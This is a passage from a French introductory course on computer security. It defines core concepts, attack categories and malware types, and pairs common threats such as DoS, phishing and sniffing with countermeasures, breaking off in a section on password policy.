Sécurité des systèmes

informatiques

1.0

Sécurité informatique
Légende
Table des matières

3
Objectifs 5

I. Concepts de base de la sécurité informatique 6

1. Terminologies utilisées dans la sécurité informatique.......................................... .7

2. Concepts et principes de la sécurité informatique............................................... .9

3. Typologie des attaques................................................................................. .13

II. Vulnérabilités, menaces, attaques, et contre-mesures 17

1. Principales menaces-attaques........................................................................ .17

2. Logiciel malveillants..................................................................................... .19

3. Mécanismes de protection............................................................................. .21

III. Attaques et Malware avec KALI Linux et le Framework

Metasploitable 2 23

1. Installations et configurations........................................................................ .23

2. Exploits et Virus........................................................................................... .24

IV. Cryptographie 25

1. Généralités sur la cryptographie..................................................................... .25

2. Cryptographie classique ou traditionnelle......................................................... .25

3. Cryptographie moderne................................................................................ .28

4. Signature électronique ou numérique.............................................................. .32

5. Certificat..................................................................................................... .35

6. Infrastructure de gestion de clés.................................................................... .36

V. Atelier sur la cryptographie 40

1. Vérifier l'intégrité d'un fichier sur Windows...................................................... .40

2. Gpg4Win.................................................................................................... .41

VI. Politique de sécurité 43

1. Élaboration d'une politique de sécurité............................................................ .43

2. Sensibiliser le personnel aux risques encourus................................................. .46

VII. Cadre réglementaire 49

1. Cadre institutionnel...................................................................................... .49

2. Cadre juridique............................................................................................ .50

3. Cadre réglementaire..................................................................................... .51

4
Objectifs
Au terme de ce module, vous serez à mesure de Maîtriser les concepts de la sécurité
informatique
Comme objectifs spécifiques, au terme de cette séquence, vous serez capable de :
 Connaître les terminologies de la sécurité informatique ;
 Décrire les types d'attaques ;
 Appliquer des contre-mesures ;
 Maîtriser les techniques de cryptographie;
 Mettre en œuvre une planification/politique de sécurité;
 Connaître le cadre réglementaire, institutionnel et juridique.

5
 I.Concepts de base de la sécurité
informatique

Pour introduire l'intérêt de la sécurité informatique, on peut énumérer quelques grands

problèmes de sécurité informatique qui ont émaillé le monde ces dernières années.
En 2017, le ransonware WannaCry a touché plus de 300 000 ordinateurs de sociétés
multinationales et de services publics dans au moins moins 150 pays et a occasionné des
pertes économiques estimées à plus de 4 milliards $USD. En 2019, WannaCry fut le
ransomware le plus courant, avec 23.56\% des attaques de ce type et aurait touché plus de
230 000 ordinateurs et occasionné des pertes économiques d'environ 4 milliards USD
(Source : Precise Security (https://www.precisesecurity.com/).
En 2017, il y a eu également NotPetYa dont la propagation était plus rapide que WannaCry
dont il copiait l'exploitation de la même vulnérabilité EternalBlue. Ses victimes étaient les
banques, les aéroports et administration en Ukraine, Rosneft la société pétrolière russe, la
société allemande Beiersdorf, Auchan, ... et les pertes économiques estimées d'environ 3
milliards $USD (Source : https://www.advens.fr/fr/advens/actualites/actus/informations-sur-
le-ransomware-notpetya).
La liste est longue ; il existe une liste des vulnérabilités et menaces connues ou des correctifs
dans les bases suivantes :
 https://cve.mitre.org/;
 https://cyberwatch.fr/vulnerabilites/;
 https://nvd.nist.gov/;
 https://www.precisesecurity.com/;
 ...
En plus, des statistiques de centres de recherche en cybersécurité (https://www.cyber-
cover.fr/cyber-documentation/cyber-criminalite/top-5-des-cyberattaques-observees-dans-le-
monde-depuis-le-debut-de-lannee-2021) montrent que :
 97% de réseaux d'entreprise ont des activités suspectes;
 82% des entreprises ont été victimes de cyberattaques en 2019;
 3 millions de nouveaux malwares apparaissent chaque jour en 2019;
 On a besoin de moins de 3 minutes pour pirater un objet connecté;
 Plus de 83% de smartphones infectés en fin 2016;
 5.6 millions de données personnelles sont piratées par an;
 Google a supprimé 1.7 milliard de fausses pubs en 2016;
 1.22 million d'attaques par phishing enregistrées en 2016.
Ces statistiques ne sont pas exhaustives et les conséquences des problèmes de sécurité sont
multiples allant du déni de service à des pertes en vies humaines. Ces quelques exemples
suivant peuvent mieux illustrer cela :
 Déni de service : c'est ce qu'a occasionnées les attaques du groupe Anonymous sur
les sites de PayPal, Visa et MasterCard en représailles de l'abandon de leur soutien à
WikiLeaks, en début décembre 2010 et contre le gouvernement tunisien en début 2011
en réponse à des actes de censure commis par ce dernier
(\url{https://www.bbc.com/news/technology-12110892}) ainsi que le Sony Playstation
Network en avril 2011
(\url{https://www.theguardian.com/technology/2011/apr/26/playstation-network-
hackers-data}). Les systèmes informatiques visés sont restés pendant un certain temps
inopérants ce qui, en plus des désagréments au niveau des utilisateurs, crée des pertes
économiques sèches;

6
 Concepts de base de la sécurité informatique

 Pertes financières : en 2020 la cybercriminalité aurait coûté au monde près de 600

milliards $USD, soit 0.8% du PNB mondial, selon un rapport (The Economic Impact of
Cybercrime: No Slowing Down) publié par le Center for Strategic and International
Studies (CSIS) et McAfee;
 Perte ou mise en danger de la vie humaine : au moins 30 agents de la CIA ont été
neutralisés et des dizaines d'autres démasqués entre 2009 et 2013 après que les
services chinois et iraniens aient pu accéder à des serveurs de communication de la CIA
cachés sur Internet ...
C'est pour parer à tout cela que naît l'intérêt de sécurisation des systèmes informatiques. Ce
module présente les grands aspects en commençant par les terminologies et généralités, puis
présente les types de vulnérabilités, de menaces, d'attaques et les contre-mesures adéquates
avant de présenter les technologies utilisées par la cryptographie pour la sécurisation des
informations. Il aborde aussi l'élaboration de politique de sécurité et présente les cadres
réglementaires et juridiques.

1. Terminologies utilisées dans la sécurité informatique

Définition : Système d'information

C'est l'ensemble des ressources (matériels, logiciels, documentation, moyens de transmission,
procédures, données et informations) qui sont collectées, gardées, traitées, recherchées ou
transmises par ces ressources ainsi que les ressources humaines qui les mettent en œuvre.

Définition : Sécurité informatique

C'est l'ensemble des moyens techniques, organisationnels, juridiques et humains nécessaires à
la mise en place de moyens visant à empêcher l'utilisation non autorisée, le mauvais usage, la
modification ou le détournement d'un SI.
La sécurité informatique implique ainsi le déploiement de moyens techniques mais aussi de
solutions de prévention qui doivent prendre en compte la formation et la sensibilisation des
acteurs du SI ainsi que les règles et les bonnes pratiques pour ne pas créer de brèches
humaines.

Définition : Vulnérabilité
C'est une faille de sécurité dans un SI, qu'elle soit exploitable ou non. Une faille de sécurité est
une faute accidentelle ou intentionnelle (avec ou sans volonté de nuire), dans la spécification,
la conception ou la configuration du SI, ou dans la façon selon laquelle il est utilisé.

Exemple : Exemples de vulnérabilités

 Des bugs non corrigés par le développeur peuvent exposer l'application à d'éventuelles
attaques;
 Des ports ouverts peuvent être exploités pour avoir accès frauduleusement au PC;
 Un système d’exploitation non mis à jour régulièrement peut comporter des brèches de
sécurité;
 etc.

Définition : Attaque
C'est un moyen d'exploiter une vulnérabilité. C'est une interaction malveillante avec le
système informatique d'origine externe créée avec l'intention de nuire.
Pour une même vulnérabilité, il peut y avoir plusieurs attaques possibles.

7
 Concepts de base de la sécurité informatique

Exemple : Exemples d'attaques

 Injection de code : si un développeur ne vérifie pas ce qui est transmis par un
formulaire par exemple, on pourrait faire exécuter un code en le saisissant dans le
formulaire ou l'url;
 Cross-site scripting : si le développeur contrôle son formulaire mais pas certaines
exceptions on pourrait inventer un formulaire et envoyer à son système informatique
des données inattendus;
 Violation de gestion d'authentification : si l'authentification n'est pas bien gérée on
pourrait utiliser du code pour s'authentifier;
 etc.

Définition : Menace
C'est un acteur capable de mener une attaque en exploitant une vulnérabilité.

Définition : Risque
C'est la probabilité plus ou moins grande de voir une menace se transformer en événement
réel entraînant une perte.
Les risques informatiques peuvent être d'origine naturelle ou humaine, accidentelle ou
intentionnelle.

Définition : Contre-mesure
C'est une procédure ou technique permettant de résoudre une vulnérabilité ou de contrer une
attaque donnée.

Origines des risques

Les risques viennent de plusieurs origines qu'on peut caractériser comme suit :
 Les causes accidentelles ;
 Les erreurs comme les erreurs de manipulation, d'exploitation, de conception et de
réalisation sont souvent à l'origine de nombreuses pertes de données. Par exemple, une
ligne de commande suffit à effacer irrémédiablement le contenu d'un disque dur entier.
Parmi ces erreurs, on distingue :
- Les erreurs de saisie, de transmission et d'utilisation de l'information;
- Les erreurs d'exploitation;
- Les erreurs de conception et de réalisation.
 La malveillance qui comprend :
- le vol et le sabotage de matériel;
- les fraudes;
- le sabotage immatériel;
- l'indiscrétion et le détournement d'informations;
- le détournement de logiciels;
- l'indisponibilité de personnel stratégique.

8
 Concepts de base de la sécurité informatique

Figure 1 : Origines des risques

Complément : Évaluation des risques

Les risques informatiques s'évaluent:
 en fonction de la probabilité ou de la fréquence de leurs survenances;
 en estimant leurs effets / impacts possibles lorsque le risque survient. Ces effets
peuvent avoir des conséquences négligeables ou catastrophiques.

2. Concepts et principes de la sécurité informatique

Démarche de la sécurité informatique

La démarche traditionnelle de la sécurité consiste à cloisonner les ressources (réseaux et
serveurs) et les informations ( programmes et données) en fonction de leur sensibilité et de
leur domaine d'application, dans le respect de la réglementation. Dans cette démarche on
distingue :
 Les objectifs de la sécurité;
 La politique de sécurité;
 Les fonctions de sécurité.

Objectifs de la sécurité informatique

La sécurité d'un système repose sur trois grands objectifs :
 la confidentialité;
 l'intégrité;

9
 Concepts de base de la sécurité informatique

 la disponibilité.
Dans la littérature on ajoute souvent à ces 3 objectifs : la Non-répudiation, l'Authentification,
la traçabilité, l'auditabilité.

Figure 2 : principes de sécurité

Définition : Authentification
 L'authentification permet d'assurer que les acteurs (personne, machine, programme,
processus) qui accèdent à une ressource (machine, équipement, programme, donnée,
processus, réseau) sont ceux autorisés à le faire;
 Elle renvoie à la première idée de la notion de signature (Signature = Authentification)
à savoir que le signataire est le seul à pouvoir réaliser la signature;
 Elle implique un moyen de prouver l'identité d'un acteur grâce à :
- ce que connaît l'utilisateur (paire pseudonyme / mot de passe);
- ce que détient l'utilisateur (carte à puces),
- ce qu'est l'utilisateur (information biométrique).

Définition : Non-répudiation
 La non-répudiation permet d'assurer que l'auteur d'un acte ne peut pas ensuite nier
l'avoir effectué;
 Elle renvoie à la seconde idée de la notion de signature (Signature = Authentification +
Non répudiation) à savoir que le signataire s'engage à honorer sa signature
(engagement contractuel/juridique);
 Elle implique deux aspects dans une transaction numérique:
- La preuve d'origine : un message (une transaction) ne peut être nié par son
émetteur;
- La preuve de réception : un récepteur ne peut ultérieurement nier avoir reçu un
ordre s'il ne lui a pas plu de l'exécuter alors qu'il le devait juridiquement.

Définition : Confidentialité
 La confidentialité permet d'assurer qu'une donnée ne peut être lue que par des acteurs
habilités (selon des contraintes précises);

10
 Concepts de base de la sécurité informatique

 Elle implique que seuls les acteurs autorisés peuvent avoir accès aux informations qui
leur sont destinées. Tout accès indésirable doit être empêché. Toute interception ne
doit pas être en mesure d'aboutir, les données doivent être cryptées, seuls les acteurs
de la transaction possédant la clé de compréhension.

Exemple : Quelques illustrations du principe de confidentialité

 Un mot de passe ne doit jamais pouvoir être lu par une autre personne que son
possesseur;
 Un dossier médical ne doit pouvoir être consulté que par les malades et le personnel
médical habilité;
 On ne doit pas pouvoir intercepter le contenu d'un courrier.

Définition : Intégrité
 L'intégrité permet d'assurer qu'une donnée n'est modifiée que par des acteurs habilités
(selon des contraintes précises);
 Elle implique que les données doivent être celles que l'on attend, et ne doivent pas être
altérées de façon fortuite, illicite ou malveillante en cours de communication. L'intégrité
des données doit valider l'intégralité des données, leur précision, l'authenticité et la
validité.

Exemple : Illustrations du principe de l'intégrité

 Une modification est à interdire sur une écriture comptable validée;
 Le code binaire des programmes ne doit pas être altéré;
 Les messages de l'ingénieur système doivent être lus et non modifiés.

Définition : Disponibilité
 La disponibilité permet d'assurer que l'information sur le système soit disponible aux
acteurs autorisés;
 Elle implique que le système doit fonctionner sans faille durant les périodes d'utilisation
prévues et garantir l'accès aux services et ressources installées avec le temps de
réponse attendu.

Définition : Traçabilité
Elle permet de garantir que les accès et tentatives d'accès aux ressources sont tracés et que
ces traces sont conservées et exploitables.

Définition : Auditabilité
 L'auditabilité permet d'assurer de la capacité à détecter et à enregistrer de façon
infalsifiable les tentatives de violation de la politique de sécurité;
 Elle a pour but de garantir une maîtrise complète et permanente sur le système et en
particulier pouvoir retracer tous les événements au cours d'une certaine période;
 L'audit est un examen méthodique d'une situation relative à un produit, un processus,
une organisation, réalisé en coopération avec les intéressés en vue de vérifier la
conformité de cette situation aux dispositions préétablies, et l'adéquation de ces
dernières à l'objectif recherché.

Politique de sécurité informatique

Pour atteindre les objectifs de sécurité, il est nécessaire de mettre en œuvre une politique de
sécurité qui est l'ensemble des lois et des consignes aux fins de protéger les ressources contre
tout préjudice à leur confidentialité, leur intégrité et leur disponibilité.
La politique exhibe, dans sa rédaction sous forme de règles, des sujets et des objets et précise
les activités et opérations autorisées et interdites.

11
 Concepts de base de la sécurité informatique

Complément : Élaboration de Politique de sécurité

Pour élaborer une politique de sécurité informatique on peut procéder comme suit :
 On commence par identifier les vulnérabilités et les menaces :
- En mode fonctionnement normal pour définir tous les points faibles;
- En cas d'apparition de défaillances car un système fragilisé est en général
vulnérable; c'est dans un de ces moments intermédiaires qu'une intrusion peut le
plus facilement réussir.
 Il faut ensuite évaluer les probabilités associées à chacune des menaces;
 Puis il faut évaluer le coût d'une intrusion réussie;
 Il faut aussi choisir les contre-mesures et évaluer les coûts des contre-mesures;
 Il faut enfin prendre les décisions.

Remarque : Fonctions de sécurité

La politique de sécurité utilise un catalogue de fonctions de sécurité, parmi lesquelles on peut
trouver : l'authentification, la traçabilité, et l'audit du système déjà définis mais aussi
l'identification des sujets, l'intimité numérique, l'imputabilité des actions, l'autorisation des
actions, le contrôle d'accès, la protection des contenus, et la gestion de sécurité.

Architecture de sécurité informatique

Pour gérer la sécurité d'un système il faut :
 Prendre en compte les exigences et contraintes humaine, économique,
organisationnelle, juridique et technique;
 Définir une architecture de sécurité à 4 dimensions :
- Dimension humaine : les utilisateurs doivent être formés et sensibilisés à la sécurité
ainsi qu'à l’éthique professionnelle, les responsables de la sécurité doivent avoir des
compétence à jour, des mécanismes de surveillance et de dissuasion des acteurs
doivent être érigés;
- Dimension technique et opérationnelle : élaborer et mettre en œuvre le dispositif
technique pour la sécurité du matériel, la sécurité environnementale, la sécurité des
personnes, la sécurité des applications ...;
- Dimension juridique et réglementaire : respect des normes et de la législation,
élaboration de procédures, test de conformité, ...;
- Dimension politique organisationnelle et économique : élaborer une stratégie, faire
la gouvernance, définir les responsabilités, faire des évaluations, optimiser les
procédures, maîtriser des coûts.

12
 Concepts de base de la sécurité informatique

Figure 3 : Architecture de sécurité informatique

3. Typologie des attaques

Types d'attaques de sécurité

Il existe 4 catégories d'attaques de sécurité : interruption, interception, modification, et
fabrication.

Figure 4 : Illustration d'une attaque

13
 Concepts de base de la sécurité informatique

Définition : Interruption
 Manifestation : un maillon du système informatique est détruit ou devient indisponible
ou inutilisable;
 Principe de sécurité touché : disponibilité;
 Exemples : destruction matérielle (disque dur, câble réseau).

Définition : Interception
 Manifestation : un acteur non autorisé obtient l'accès à un maillon du système
informatique ;
 Principe de sécurité touché : confidentialité;
 Exemples : écoute téléphonique (capture de données sur le réseau), copie non
autorisée de programmes/données.

Définition : Modification
 Manifestation : un acteur non autorisé obtient l'accès à un maillon du système
informatique et le modifie (de façon presque indétectable);
 Principe de sécurité touché : intégrité;
 Exemples : modification des données transmises sur un réseau, altération de
données/programmes, ...

Définition : Fabrication
 Manifestation : un acteur non autorisé insère des contrefaçons dans le système
informatique;
 Principe de sécurité touché : authenticité;
 Exemples : ajout de faux messages sur le réseau, ajout de données dans un fichier, ...

Scénarios d'attaques passives/actives

On fait la différence entre attaques passives et attaques actives.

Attaques passives Attaques actives

capturer une information modifier le flot de données ou
But transmise créer un faux flot
ecoutes indiscrètes ou
surveillance de
Moyens transmission
Mascarade : prétend être un
acteur qu'on n'est pas;
Rejeu : capture passive de
données et retransmission
ultérieure pour provouer un
effet non autorisé;
Modification de messages (man
in the middle) : tout ou
partie de message transmis est
altéré/retardé/réorganisé;
Déni de service (DoS) :
empêcher l'utilisation normale
Capture du contenu d'un ou les fonctionnalités de
Principales attaques message,Analyse de trafic communication.
Les attaques passives
sont très difficiles à
détecter car elles ne
causent aucune altération
Observations des données.
Tableau 1 : Attaques passives et actives

14
 Concepts de base de la sécurité informatique

Complément : Type d'attaques

On peut catégoriser les attaques comme suit :
 Les attaques sur l'authentification : déguisement, usurpation d'identité, intrusion, ...;
 Les attaques sur l'intégrité : modification de message, des données, ...;
 Les attaques sur la confidentialité : espionnage, vol d'informations, ...;
 Les attaques sur la disponibilité : saturation, déni de service ;
 Les attaques de type social-engeneering : duperie, ignorance, insouciance, ...

Définition : Logiciel malveillant ou malware

Un logiciel malveillant (malware) est un logiciel développé dans le but de nuire à un système
informatique.
On distingue plusieurs types de logiciels malveillants : virus, vers, cheval de trois, spyware,
ransomware, keylogger, rootkit, ...

Description Exemple
C'est une partie d'un malware qui reste
Le virus Tchernobyl, qui fut l'un des virus les
dormante dans le système hôte jusqu'à un
plus déstructeurs, avait une bombe logique qui
déclencheur (instant précis, ou survenance
Bombe logique s'est activée le 26 avril 1999, jour du treizième
d'un événement, ou encore la réunion de
anniversaire de la catastrophe nucléaire de
certaines conditions), pour lancer des effets
Tchernobyl.
dévastateurs.
Trojan.ByteVerify est un cheval de Troie
sous forme d'une applet java. Ce cheval de
C'est est un programme effectuant une
Troie exploitait une vulnérabilité de la
fonction illicite tout en donnant l'apparence
machine virtuelle java de Microsoft permettant
Cheval de Troie d'effectuer une fonction légitime. La fonction
à un pirate d'exécuter du code arbitraire sur la
illicite peut consister en la divulgation ou
machine infectée. Par exemple,
l'altération d'informations.
Trojan.ByteVerify pouvait modifier la page
d'accueil d'Internet explorer.
Au début des années 2000, il y avait une porte
C'est est un moyen de contourner les
dérobée dans le SGBD interbase de Borland .
mécanismes de contrôle d'accès. Il s'agit d'une
Il suffisait d'entrer le nom d'utilisateur
faille du système de sécurité due à une faute
politically et le mot de passe correct pour se
Backdoor de conception accidentelle ou intentionnelle
connecter à la base de données avec les droits
(cheval de Troie en particulier). C'est donc
d'administrateur. Beaucoup fréquents dans les
une fonctionnalité inconnue de l'utilisateur
équipements réseaux (routeur) et IOT :
légitime qui donne un accès secret au logiciel.
comptes admin par défaut ...
C'est un programme qui peut se reproduire en
s'adjoignant à un autre programme (du
système ou d'une application) et qui devient
PsybOt, découvert en 2009, est un virus
ainsi un cheval de Troie. Il peut se propager à
Virus informatique ayant la capacité d'infecter les
d'autres ordinateurs à l'aide du programme
routeurs et modems haut débit.
légitime sur lequel il s'est greffé. Il peut aussi
avoir comme effets de nuire en perturbant le
fonctionnement de l’ordinateur infecté.
C'est un programme autonome qui se
reproduit et se propage à l'insu des
utilisateurs. Contrairement aux virus, un ver
n'a pas besoin d'un logiciel hôte pour se
dupliquer. Le ver a habituellement un objectif
Vers malicieux comme : espionner l'ordinateur
dans lequel il réside, offrir une porte dérobée
à des pirates informatiques, détruire des
données sur l'ordinateur infecté, ou envoyer Le ver Blaster avait pour but de lancer une
de multiples requêtes vers un serveur Internet attaque par DoS sur le serveur de mises à jour
dans le but de le saturer. de Microsoft.
C'est un programme qui fait de la collecte
d'informations personnelles sur l'ordinateur
Spyware ou logiciel espion
d'un utilisateur sans son autorisation et les
transmet à un ordinateur tiers.
Tableau 2 : quelques malwares

15
 Concepts de base de la sécurité informatique

Complément : Les types d'attaquants

On catégorise également les auteurs des attaques :
 Les hackers black hats : ...
 Les hackers white hats : ...
 Les hackers grey hats : ...
 Les hackers universitaires : ...
 Les script kiddies : ...

16
 II.Vulnérabilités, menaces, attaques, et
contre-mesures

Pour se protéger des malwares, il convient de les connaître, de connaître les vulnérabilités qui
en sont à l'origine, afin de prendre les contre-mesures efficaces. C'est pourquoi en sécurité
informatique on étudie les malwares.
Ce module présente certains des types de malwares les plus répandus ainsi que les contre-
mesures correspondantes.

1. Principales menaces-attaques

Définition : Le Déni de service (DoS)

Il s'agit d'une attaque dont le but est de paralyser un service ou un réseau complet. Les
utilisateurs ne peuvent plus alors accéder aux ressources.

Mesure pour parer au Déni de service (DoS)

La meilleure parade est l'utilisation d'un parefeu (firewall) ou la répartition des serveurs sur un
réseau sécurisé.

Définition : L'intrusion
L'intrusion dans un système informatique a généralement pour but la réalisation d'une menace
et est donc une attaque. Les conséquences peuvent être catastrophiques : vol, fraude, incident
diplomatique, chantage...

Mesure pour parer à l'intrusion

Le principal moyen pour prévenir les intrusions est le firewall. Il est efficace contre les
fréquentes attaques de pirates amateurs, mais d'une efficacité toute relative contre des pirates
expérimentés et bien informés.
Disposer d'une politique de gestion efficace des accès comme les mots de passe est une
mesure simple et efficace qui permet de parer à l'intrusion.

Définition : L'hameçonnage (phishing)

L'hameçonnage consiste à duper l'internaute (par exemple grâce à une page factice d'un site
bancaire ou e-commerce) pour qu'il communique des informations confidentielles (nom, mot
de passe, numéro PIN...). Ces données sont ensuite utilisées pour obtenir de l'argent ou avoir
des accès non autorisées.
C'est un gros frein au développement de la banque et de l'administration en ligne.

Mesure pour parer à l'hameçonnage

Il faut beaucoup de sensibilisation et une veille continue sur les sites de grande audience pour
parer aux attaques de type hameçonnage.

Définition : L'ingénierie sociale « social engeneering »

C'est l'utilisation des moyens usuels (téléphone, émail, ...) et l'usurpation d'identité par un
pirate pour chercher et obtenir des renseignements confidentiels auprès de tiers (particulier,
personnel d'une entreprise) en vue d'une intrusion future.

17
 Vulnérabilités, menaces, attaques, et contre-
mesures
Mesure pour parer à l'ingénierie sociale
Aucun dispositif de protection ne peut protéger l'utilisateur contre ce type d'attaque
(arnaques), hormis une formation et le bon sens.

Définition : Attaques par rebond

Lors d'une attaque, le pirate garde toujours à l'esprit le risque de se faire repérer, c'est la
raison pour laquelle les pirates privilégient habituellement les attaques par rebond, consistant
à attaquer une machine par l'intermédiaire d'une autre machine, afin de masquer les traces
permettant de remonter à eux (telle que l'adresse IP) mais aussi dans le but d'utiliser les
ressources de la machine servant de rebond.

Mesure pour parer aux attaques par rebond

Il faut protéger son réseau ou son ordinateur personnel ; sinon il est possible de se retrouver
complice d'une attaque et en cas de plainte de la victime, la première personne interrogée
sera le propriétaire de la machine ayant servi de rebond.
Avec le développement des réseaux sans fils, ce type de scénario risque de devenir de plus en
plus courant car lorsque le réseau sans fil est mal sécurisé, un pirate situé à proximité peut
l'utiliser pour lancer des attaques.

Définition : Le canular informatique (hoax)

Le canular informatique (hoax) est un courrier électronique incitant généralement le
destinataire à retransmettre le message à ses contacts sous divers prétextes. Ils saturent le
réseau, et font perdre du temps à leurs destinataires. Ils sont souvent liés à des attaques de
type hameçonnage.
Dans certains cas, ils incitent l'utilisateur à effectuer des manipulations dangereuses sur son
poste (suppression d'un fichier prétendument lié à un virus par exemple).

Mesure pour parer à un hoax

En amont, il faut éviter de laisser traîner son émail sur les sites non sûrs (forums, chat en
ligne, réseaux sociaux, ...) et avoir une bonne politique de gestion du courrier électronique
(gestion de spam, signature, ...).
Il faut aussi faire attention aux actions demandées dans les courriers et ne pas cliquer sur tous
les liens ou envoyer des informations sans être sûrs de l'identité de l'interlocuteur.

Définition : Les écoutes (sniffing)

Les écoutes (sniffing) sont des attaques permettant de récupérer toutes les informations
transitant sur un réseau (on utilise pour cela un logiciel sniffer).
Elles sont généralement utilisées pour récupérer les mots de passe des applications qui ne
chiffrent pas leurs communications et pour identifier les machines qui communiquent sur le
réseau.

Mesure pour parer au sniffing

Le chiffrement des communications ou l'utilisation de mécanisme de signature/certificat
permet de se prémunir contre les effets du sniffing.

Définition : L'usurpation d'identité (spoofing)

L'usurpation d'identité (spoofing) est une attaque consistant à prendre l'identité d'une autre
personne ou d'une autre machine
Elle est généralement utilisée pour récupérer des informations sensibles, que l'on ne pourrait
pas avoir autrement.

18
 Vulnérabilités, menaces, attaques, et contre-
mesures
Mesure pour parer au spoofing
Il faut penser à des mécanismes de gestion d'accès à plusieurs facteurs (pseudonyme/mot de
passe et confirmation par un code envoyé par SMS par exemple).

Définition : La porte dérobée (backdoor)

La porte dérobée (backdoor) est une technique qui permet d'ouvrir un accès frauduleux réseau
sur un système informatique, et ainsi permettre d'exploiter frauduleusement à distance la
machine.

Mesure contre un backdoor

Il faut toujours s'assurer qu'un logiciel ou système qu'on déploie ne comporte pas de backdoor
en vérifiant l'origine mais aussi en auditant et surveillant son comportement.

Définition : Le réseau de robots logiciels (Botnet)

Le réseau de robots logiciels (Botnet) est une technique d'attaque informatique utilisant un
réseau de robots logiciels installés sur des machines aussi nombreuses que possible.
Ces robots logiciels se connectent sur des serveurs au travers desquels ils peuvent recevoir
des instructions de mise en œuvre de fonctions non désirées tels que l'envoi de spams, le vol
d'information, la participation à des attaques de saturation...).

Mesure contre le botnet

En général un botnet va tenter un déni de service, donc l'utilisation de firewall et de
mécanisme de sécurisation de son réseau peut être une mesure pour y parer.

Définition : La perturbation
C'est une attaque sur le réseau visant à fausser le comportement du système ou à l'empêcher
de fonctionner comme prévu (saturation, dégradation du temps de réponse, génération
d'erreurs...).

Définition : Le brouillage
C'est une attaque réseau de haut niveau qui vise à rendre le système inopérant.

Définition : L'interception de signaux compromettants

C'est une attaque qui tente de récupérer un signal électromagnétique pour l'interpréter et en
déduire des informations utilisables.

2. Logiciel malveillants

Définition : Notion de logiciel malveillant

Un logiciel malveillant (malware) est un logiciel développé dans le but de nuire à un système
informatique ou dont le fonctionnement normal est détourné pour servir à une action
frauduleuse contre un système informatique.

Le virus
Un virus est un logiciel malveillant, généralement de petite taille, qui se transmet par les
réseaux ou les supports d'information amovibles, s'implante au sein des programmes en les
parasitant, se duplique à l'insu des utilisateurs et produit ses effets dommageables quand le
programme infecté est exécuté ou quand survient un événement donné.

19
 Vulnérabilités, menaces, attaques, et contre-
mesures
Sur Internet, les virus peuvent contaminer une machine de plusieurs manières :
 Téléchargement de logiciel puis exécution de celui-ci sans précautions ;
 Ouverture sans précautions de documents contenant des macros ;
 Pièce jointe de courrier électronique (exécutable, script type vbs...) ;
 Exploitation d'un bug du logiciel de courrier.
La meilleure parade est l'utilisation d'un antivirus à jour et d'effectuer les mises à jour des
logiciels (pour éviter l'exploitation des bugs).

Le ver (worm)
Un ver est un logiciel malveillant indépendant qui se transmet d'ordinateur à ordinateur par
l'Internet ou tout autre réseau en utilisant les failles existantes et perturbe le fonctionnement
des systèmes concernés en s'exécutant à l'insu des utilisateurs.
Contrairement au virus, le ver ne s'implante pas au sein d'un autre programme.
En plus, le ver peut se propager de lui-même sur un réseau sans qu'il ne soit soumis à aucun
stimulus particulier. Ses programmes malicieux se reproduisent par eux-mêmes à l'intérieur
même des ordinateurs infectés ainsi que sur les ordinateurs auquel il a accès à partir des
machines infectées. Alors que le virus nécessitera d'être « activé » pour faire effet, le
programme transportant le virus devant être effectué ou certain.
Le moyen le plus efficace de se protéger contre un ver ou d'un virus est de toujours faire ses
mises à jour régulièrement et de se prémunir d'un pare-feu et d'un antivirus efficace.
Ceux-ci utilisant des failles souvent connues dans divers logiciels, il est aisé pour eux de
s'introduire sur une machine qui n'est pas prête à se faire attaquer.

Le Cheval de Troie (trojan)

Il s'agit d'un programme qui exécute des instructions sans l'autorisation de l'utilisateur. Il
prend l'apparence d'un programme valide mais il contient en réalité une fonction illicite cachée,
grâce à laquelle il contourne les sécurités informatiques.
Il pénètre ainsi par effraction dans les fichiers de l'utilisateur pour les modifier, les consulter ou
même les détruire. Le cheval de Troie, contrairement au ver, ne se réplique pas et il peut
rester inoffensif pendant quelques jours, semaines ou mois et se mettre en action à la date
programmée.

Le logiciel espion (spyware)

Un spyware est un code qui permet de transmettre les habitudes d'un internaute, que l'on peut
qualifier de logiciel espion avec des objectifs de commerce et de renseignement (études
marketing, etc.).
Il peut intégrer des programmes malveillants de toutes sortes mais également affecter la
confidentialité des données de l'utilisateur.

Le ransomware
Un ransomware est un logiciel malveillant qui prend en otage les ressources informatiques qui
pourront être éventuellement libérées après le payement d'une rançon, cela permet d'effectuer
du chantage et d'escroquer des victimes.

L'enregistreur de frappe (keylogger)

L'enregistreur de frappe (keylogger) est un programme généralement invisible installé sur le
poste d'un utilisateur et chargé d'enregistrer à son insu ses frappes clavier pour intercepter
entre autre des mots de passe.

Le rootkit
Le rootkit est un ensemble de logiciels permettant généralement d'obtenir les droits
d'administrateur sur une machine, d'installer une porte dérobée, de truquer les informations

20
 Vulnérabilités, menaces, attaques, et contre-
mesures
susceptibles de révéler la compromission, et d'effacer les traces laissées par l'opération dans
les journaux système.

3. Mécanismes de protection

Types de mécanisme
Face aux attaques, aux menaces et aux vulnérabilités informatiques, plusieurs mécanismes de
protection peuvent être envisagé à savoir:
 Les mots de passe ;
 Les antivirus ;
 Les firewall (Pare-feu) ;
 Les anti-logiciels espions ;
 Les précautions et bonne attitude,...

Les mots de passe

Le mot de passe est un outil d'authentification utilisé notamment pour accéder à un
équipement numérique, pour se connecter sur ses comptes, accéder à ses données, ...
Les attaques sur les mots de passe peuvent consister à faire de nombreux essais jusqu'à
trouver le bon mot de passe. On distingue principalement les deux méthodes suivantes :
 L'attaque par dictionnaire ;
 L'attaque par force brute.

Attaques sur les mots de passe

 L'attaque par dictionnaire : le mot testé est pris dans une liste prédéfinie contenant les
mots de passe les plus courants et aussi des variantes de ceux-ci.
 L'attaque par force brute : toutes les possibilités sont faites dans l'ordre jusqu'à trouver
la bonne solution (par exemple de “aaaaaa” jusqu'à “ZZZZZZ” pour un mot de passe
composé strictement de six caractères alphabétiques).

Politique de gestion des mots de passe

Une bonne politique de gestion de mot de passe consiste à :
 Utiliser des mots de passe de qualité : savoir choisir des mots de passe difficile à
retrouver à l'aide d'outils automatisés, et difficile à deviner par une tierce personne ;
